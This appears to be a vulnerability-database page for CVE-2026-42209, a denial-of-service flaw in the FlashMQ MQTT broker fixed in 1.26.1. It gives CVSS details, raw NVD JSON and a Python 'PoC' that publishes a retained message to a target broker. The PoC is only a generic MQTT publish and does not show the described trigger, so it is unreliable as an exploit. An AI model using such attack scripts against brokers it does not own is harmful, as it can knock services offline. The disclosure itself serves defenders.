Security Vulnerability Report
中文
CVE-2026-42209 CVSS 6.5 MEDIUM

CVE-2026-42209

Published: 2026-05-08 22:16:32
Last Modified: 2026-05-11 17:16:33
Source: [email protected]

Description

FlashMQ is a MQTT broker/server, designed for multi-CPU environments. Prior to version 1.26.1, a remote client with retained publish permission can crash the FlashMQ broker when both set_retained_message_defer_timeout and set_retained_message_defer_timeout_spread are configured to non-default values, resulting in denial of service. If anonymous retained publishing is allowed, no authentication is required; otherwise, the attacker needs the corresponding publish permission. This issue has been patched in version 1.26.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

FlashMQ < 1.26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import paho.mqtt.client as mqtt import time # Configuration for the target FlashMQ broker # Note: The target must have non-default defer timeout settings TARGET_BROKER = "192.168.1.100" TARGET_PORT = 1883 TOPIC = "vulnerable/topic/retained" PAYLOAD = "Trigger_Crash" def on_connect(client, userdata, flags, rc): print(f"Connected with result code {rc}") # Sending a retained message to trigger the DoS client.publish(TOPIC, PAYLOAD, qos=0, retain=True) print("PoC sent: Retained message published.") def main(): client = mqtt.Client(client_id="PoC_Attacker") client.on_connect = on_connect try: # Connect to the broker client.connect(TARGET_BROKER, TARGET_PORT, 60) client.loop_forever() except Exception as e: print(f"Exception occurred: {e}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42209", "sourceIdentifier": "[email protected]", "published": "2026-05-08T22:16:32.103", "lastModified": "2026-05-11T17:16:32.753", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "FlashMQ is a MQTT broker/server, designed for multi-CPU environments. Prior to version 1.26.1, a remote client with retained publish permission can crash the FlashMQ broker when both set_retained_message_defer_timeout and set_retained_message_defer_timeout_spread are configured to non-default values, resulting in denial of service. If anonymous retained publishing is allowed, no authentication is required; otherwise, the attacker needs the corresponding publish permission. This issue has been patched in version 1.26.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-369"}]}], "references": [{"url": "https://github.com/halfgaar/FlashMQ/commit/193b6e7767889511cfa8e933908ea5e6a1077a1f", "source": "[email protected]"}, {"url": "https://github.com/halfgaar/FlashMQ/issues/167", "source": "[email protected]"}, {"url": "https://github.com/halfgaar/FlashMQ/releases/tag/v1.26.1", "source": "[email protected]"}, {"url": "https://github.com/halfgaar/FlashMQ/security/advisories/GHSA-2789-vfcg-5922", "source": "[email protected]"}, {"url": "https://github.com/halfgaar/FlashMQ/issues/167", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.